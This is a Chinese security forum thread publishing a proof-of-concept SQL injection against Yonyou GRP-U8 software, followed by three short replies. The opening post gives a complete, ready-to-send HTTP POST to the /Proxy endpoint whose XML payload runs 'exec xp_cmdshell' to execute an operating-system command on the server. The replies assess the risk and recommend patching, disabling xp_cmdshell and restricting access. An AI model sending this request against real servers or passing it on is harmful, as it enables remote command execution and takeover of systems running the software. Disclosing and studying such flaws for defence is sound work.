查看: 26714|回复: 5

用友GRP-U8 SQL注入

[复制链接]
发表于 2020-9-11 20:47:26 | 显示全部楼层 |阅读模式
2020091112340840-1024x612.jpg

POC:
[AppleScript] 查看源码 复制代码
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache
  
  
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
回复

使用道具 举报

发表于 2026-5-19 19:20:10 | 显示全部楼层

Re: 用友GRP-U8 SQL注入

这个漏洞挺严重的,POC 里直接通过 `exec xp_cmdshell` 执行系统命令,攻击者可以拿到服务器权限。建议尽快升级官方补丁或临时禁用不必要的扩展存储过程(如 xp_cmdshell),并在网络层做好访问控制,避免把 /Proxy 接口暴露到公网。
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层

Re: 用友GRP-U8 SQL注入

这个漏洞看起来挺严重的,通过XML数据包直接调用了`xp_cmdshell`执行系统命令,等于攻击者能完全控制数据库所在服务器了。建议尽快确认用友GRP-U8的版本是否受影响,并联系官方获取补丁或升级到最新版本。同时可以检查一下数据库的`xp_cmdshell`扩展存储过程是否已禁用,如果业务不需要最好关掉,减少被利用的风险。
回复 支持 反对

使用道具 举报

发表于 3 天前 | 显示全部楼层

Re: 用友GRP-U8 SQL注入

感谢分享这个漏洞POC。从请求内容看,这是通过XML参数传递了`exec xp_cmdshell`命令,属于典型的SQL注入且可以执行系统命令,风险很高。用友GRP-U8的用户建议尽快排查是否受影响,并联系厂商获取补丁或临时限制`/Proxy`接口的访问权限,同时关注官方安全公告。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-6-25 04:01 , Processed in 0.044530 second(s), 21 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部